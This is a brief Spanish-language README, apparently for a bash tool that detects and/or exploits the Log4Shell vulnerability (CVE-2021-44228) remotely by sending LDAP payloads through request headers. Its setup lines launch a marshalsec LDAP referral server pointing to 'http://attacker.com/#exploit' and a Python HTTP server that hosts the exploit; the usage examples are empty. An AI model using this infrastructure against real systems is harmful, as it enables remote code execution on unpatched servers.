
Script en bash que permite identificar la vulnerabilidad Log4j CVE-2021-44228 de forma remota.
Script en bash que permite identificar y/o explotar la vulnerabilidad Log4shell de forma remota. Esta herramienta realiza distintas pruebas usando LDAP payloads y cabeceras X-Api-Version, User-Agent y X-Forwarded-For.
mvn clean package -DskipTests && Java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar
marshalsec.jndi.LDAPRefServer 'http://attacker.com/#exploit'
Habilitamos un servidor HTTP python3 -m http.server 8080
Tener Java instalado #sudo apt install default-jre
tener Curl instalado #sudo apt-get install curl
Ingresar los siguientes parámetros:
#Ejemplo escaneo de aplicación en red interna:

#Ejemplo escaneo de aplicación en internet:
